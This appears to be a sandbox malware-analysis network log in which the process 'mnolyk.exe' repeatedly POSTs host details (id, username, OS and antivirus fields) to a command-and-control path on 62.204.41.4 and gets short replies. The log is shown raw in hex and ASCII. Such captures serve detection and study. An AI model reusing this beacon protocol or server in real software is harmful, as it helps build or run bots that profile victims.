                            Feb 8, 2023 17:39:52.269838095 CET    713    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.334613085 CET    714    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            526    192.168.2.4    50221    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:52.520097017 CET    714    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.582335949 CET    715    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            527    192.168.2.4    50222    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:52.771625042 CET    715    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.834398985 CET    716    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            528    192.168.2.4    50223    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:53.012602091 CET    716    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.077357054 CET    717    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            529    192.168.2.4    50224    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:53.250127077 CET    717    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.315500975 CET    718    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            53    192.168.2.4    49748    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:37:39.760373116 CET    242    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.827455997 CET    242    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            530    192.168.2.4    50225    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:53.481401920 CET    718    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.544372082 CET    719    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            531    192.168.2.4    50226    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:53.716249943 CET    719    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.780318975 CET    720    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            532    192.168.2.4    50227    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:53.949662924 CET    720    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.012635946 CET    721    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            533    192.168.2.4    50228    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:54.186331987 CET    721    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.251750946 CET    722    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            534    192.168.2.4    50229    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:54.430749893 CET    722    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.492405891 CET    723    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            535    192.168.2.4    50230    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:54.670213938 CET    723    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.733669043 CET    724    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            536    192.168.2.4    50231    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:54.903522015 CET    724    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.966681004 CET    725    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            537    192.168.2.4    50232    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:55.156269073 CET    725    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.219661951 CET    726    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            538    192.168.2.4    50233    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:55.389174938 CET    726    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.454381943 CET    727    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            539    192.168.2.4    50234    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:55.624345064 CET    727    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.688477993 CET    728    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            54    192.168.2.4    49749    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:37:39.995475054 CET    243    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.062891960 CET    243    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            540    192.168.2.4    50235    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:55.857099056 CET    728    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.921838045 CET    729    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            541 | 192.168.2.4 | 50236 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:56.097183943 CET | 729 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.162142992 CET | 730 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            542 | 192.168.2.4 | 50237 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:56.348459005 CET | 730 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.413418055 CET | 731 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            543 | 192.168.2.4 | 50238 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:56.593363047 CET | 731 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.658799887 CET | 732 | IN | HTTP/1.1 200 OK
